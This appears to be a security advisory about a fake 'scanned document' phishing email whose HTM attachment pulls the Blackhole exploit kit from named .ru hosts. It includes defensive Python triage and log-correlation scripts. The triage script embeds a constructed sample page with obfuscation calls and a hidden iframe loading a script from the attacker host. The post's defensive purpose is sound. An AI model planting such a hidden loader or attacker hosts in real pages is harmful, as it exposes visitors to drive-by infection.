The Blackhole Moves In Closer
The body gives little information about what is attached beyond a scan, the number of pages and the sender, all things you would expect from a scan sent over the network. The attachment itself is the giveaway: a scan-to-email job normally arrives as a PDF or an image, while this one arrives as an HTM file. Once opened, the page renders locally, and victims would see a page in their browser that looked like this -
Meanwhile, beneath the surface, their browser was interpreting this -
The page attempts to connect to the domain cserimankra[dot]ru on port 8080 and download another script from /images/aublbzdni.php. If that destination is unreachable, it requests stopbadware.org to establish whether the machine has internet connectivity at all. The connections were observed coming from local port 1063, which IANA registers as KyoceraNetDev, so to a tool that labels ports from the registry the traffic resembles network printer traffic. Two caveats: 1063 is the client-side port, and older Windows versions (XP/2003) hand out ephemeral source ports from 1025 upward, so it may simply be the next free port rather than a deliberate disguise; and it is Kyocera traffic, not HP traffic as the email claims. Still, it is enough to blend in on a quick look at the traffic.
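The obfuscated script that the browser was interpreting is not reproduced here, so the following is an added example, not code from the original post or from this campaign: a static triage script that inspects an HTM attachment as plain text (never rendering it and never making a network request) and reports the indicators described above. The sample attachment is constructed for illustration; it reuses only the domain and path named in this post, and the "Scan from a HP ScanJet" title is an assumed stand-in for the lure.

```python
"""Static triage of an HTM e-mail attachment without rendering it.

Added example. SAMPLE_HTM is a constructed stand-in for the attachment,
not the real file; only the domain and path come from the post.
"""
import re
from urllib.parse import urlparse

# Constructed sample: the visible "please wait" page is what the victim sees,
# the script blocks and the 1x1 iframe are what the browser actually executes.
SAMPLE_HTM = """<html><head><title>Scan from a HP ScanJet</title></head>
<body><h1>Please wait a moment. You will be forwarded.</h1>
<script type="text/javascript">
var d = document;
d.write(unescape("%3Cdiv%20id%3D%22x%22%3E%3C%2Fdiv%3E"));
</script>
<script>
var a = "6a617661736372697074";
eval(String.fromCharCode(0x61, 0x6c, 0x65, 0x72, 0x74));
</script>
<iframe src="http://cserimankra.ru:8080/images/aublbzdni.php" width="1" height="1"></iframe>
</body></html>"""

SCRIPT_RE = re.compile(r'<script\b[^>]*>(.*?)</script>', re.I | re.S)
URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.I)
IFRAME_RE = re.compile(r'<iframe\b[^>]*>', re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*["\']?([^"\'\s>]+)')

# Constructs that legitimate "scan notification" pages have no reason to use.
OBFUSCATION_PATTERNS = {
    "eval(": re.compile(r'\beval\s*\('),
    "unescape(": re.compile(r'\bunescape\s*\('),
    "String.fromCharCode": re.compile(r'String\.fromCharCode'),
    ".write(": re.compile(r'\.write\s*\('),          # document.write / aliased d.write
    "long hex literal": re.compile(r'["\'][0-9a-fA-F]{16,}["\']'),
}


def extract_scripts(htm):
    """Return the body of every <script> block, in document order."""
    return [m.group(1) for m in SCRIPT_RE.finditer(htm)]


def obfuscation_hits(htm):
    """Names of obfuscation patterns found anywhere in the script blocks."""
    scripts = "\n".join(extract_scripts(htm))
    return sorted(name for name, rx in OBFUSCATION_PATTERNS.items() if rx.search(scripts))


def hidden_iframes(htm):
    """Count iframes that are 0/1 pixel in either dimension or styled invisible."""
    count = 0
    for tag in IFRAME_RE.findall(htm):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
        if tiny or "display:none" in tag.replace(" ", "").lower():
            count += 1
    return count


def suspicious_urls(htm):
    """Every URL in the file, paired with the reasons it looks wrong (may be empty)."""
    out = []
    for url in URL_RE.findall(htm):
        p = urlparse(url)
        reasons = []
        if p.port not in (None, 80, 443):
            reasons.append(f"port {p.port}")
        if p.path.endswith(".php") and "/images/" in p.path:
            reasons.append("script under /images/")
        out.append((url, reasons))
    return out


def triage(htm):
    """Summarise the indicators without executing anything in the file."""
    urls = suspicious_urls(htm)
    report = {
        "script_blocks": len(extract_scripts(htm)),
        "obfuscation": obfuscation_hits(htm),
        "hidden_iframes": hidden_iframes(htm),
        "urls": [u for u, _ in urls],
        "flagged_urls": [(u, r) for u, r in urls if r],
    }
    suspicious = report["obfuscation"] or report["hidden_iframes"] or report["flagged_urls"]
    report["verdict"] = "suspicious" if suspicious else "no indicators"
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_HTM).items():
        print(f"{key}: {value}")
```

Run it against a suspect .htm saved from the mail client (not opened from it); any hit in `obfuscation`, `hidden_iframes` or `flagged_urls` is reason to hand the file to the security team rather than to a browser. The patterns are deliberately simple string matches, so a heavily packed script can evade them; the point is to make a first decision without executing the page.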
If it reaches its command-and-control server, it downloads and writes an executable named gsxohsapcpklkti[dot]exe. This executable copies itself into the Windows start-up locations so that it runs every time the PC boots, then begins pulling further exploit packages from samaragotodokns[dot]ru, hmvmgywkvayilcwh[dot]ru and xvmzegestulhtvqz[dot]ru. After several files are created, run, hidden and deleted, the malware settles in to monitor the victim's machine for sensitive information.
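The sequence described in the last two paragraphs (landing page on port 8080, connectivity check against stopbadware.org, then an executable pulled from a .ru host) is easier to spot as a chain than as single hits, because stopbadware.org on its own is a site people legitimately visit. The following is an added example, not code from the original post: it correlates those stages per client in web-proxy logs. The log lines, their space-separated format (time, client, destination host, port, method, path, status), the timestamps and the 10.0.0.x client addresses are all constructed for illustration; the domains, path and executable name are the ones given above. Adapt the parser to your proxy's real format.

```python
"""Correlate the Blackhole landing-page chain per client in proxy logs.

Added example. SAMPLE_LOG is constructed; only the domains, path and
executable name come from the post.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. 10.0.0.21 runs the full chain, 10.0.0.40 hits the
# landing page, fails (status 0) and then does the connectivity check, and
# 10.0.0.35 is an ordinary user who actually visited stopbadware.org.
SAMPLE_LOG = """\
2012-03-13T09:14:02 10.0.0.21 cserimankra.ru 8080 GET /images/aublbzdni.php 200
2012-03-13T09:14:03 10.0.0.21 stopbadware.org 80 GET / 200
2012-03-13T09:14:11 10.0.0.21 cserimankra.ru 8080 GET /gsxohsapcpklkti.exe 200
2012-03-13T09:20:44 10.0.0.35 stopbadware.org 80 GET / 200
2012-03-13T09:21:01 10.0.0.35 www.example.com 443 CONNECT - 200
2012-03-13T11:02:17 10.0.0.40 cserimankra.ru 8080 GET /images/aublbzdni.php 0
2012-03-13T11:02:19 10.0.0.40 stopbadware.org 80 GET / 200
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d+) (\S+) (\S+) (\d+)$')
LANDING_PATH = re.compile(r'^/images/[a-z]{6,}\.php$')   # random name under /images/
WINDOW = timedelta(minutes=5)                             # stages must cluster in time


def parse(log):
    """Parse the constructed format into dicts; unparseable lines are skipped."""
    events = []
    for line in log.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts, client, host, port, method, path, status = m.groups()
        events.append({
            "ts": datetime.fromisoformat(ts), "client": client, "host": host,
            "port": int(port), "method": method, "path": path, "status": int(status),
        })
    return events


def classify(ev):
    """Map one request to a stage of the chain, or None if it is unremarkable."""
    if ev["port"] == 8080 and LANDING_PATH.match(ev["path"]):
        return "landing_page"
    if ev["host"] == "stopbadware.org":
        return "connectivity_check"
    if ev["host"].endswith(".ru") and ev["port"] == 8080 and ev["path"].lower().endswith(".exe"):
        return "exe_from_ru_8080"
    return None


def detect(log):
    """Return {client: alert} for clients that hit a landing page.

    A landing-page request anchors the alert; other stages count only if they
    fall within WINDOW of it. A connectivity check alone never alerts.
    """
    by_client = defaultdict(list)
    for ev in parse(log):
        tag = classify(ev)
        if tag:
            by_client[ev["client"]].append((ev["ts"], tag))

    alerts = {}
    for client, tagged in by_client.items():
        landings = [t for t, tag in tagged if tag == "landing_page"]
        if not landings:
            continue
        t0 = min(landings)
        stages = sorted({tag for t, tag in tagged if abs(t - t0) <= WINDOW})
        alerts[client] = {
            "first_seen": t0,
            "stages": stages,
            "severity": "high" if "exe_from_ru_8080" in stages else "medium",
        }
    return alerts


if __name__ == "__main__":
    for client, alert in detect(SAMPLE_LOG).items():
        print(client, alert["first_seen"], alert["severity"], ", ".join(alert["stages"]))
```

A "high" alert means the executable was fetched and the host should be pulled for reimaging and credential resets; "medium" means the landing page was reached (or attempted) and the host deserves a look even if the download never happened, as with 10.0.0.40 above. The source-port observation from the earlier paragraph is not used here because most proxy logs do not record the client port.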
We have these variants blocked, but stay on your toes and watch for attacks like this one. Look for vague wording, poor graphics, attachments or links that are the wrong type for what the message claims (and convincing ones too), and anything that seems out of place. Note that these emails appeared to come from within the recipients' own domain; spoofing the sender this way is a common tactic for lulling potential victims into a false sense of security. Don't let them fool you, and keep it safe out there!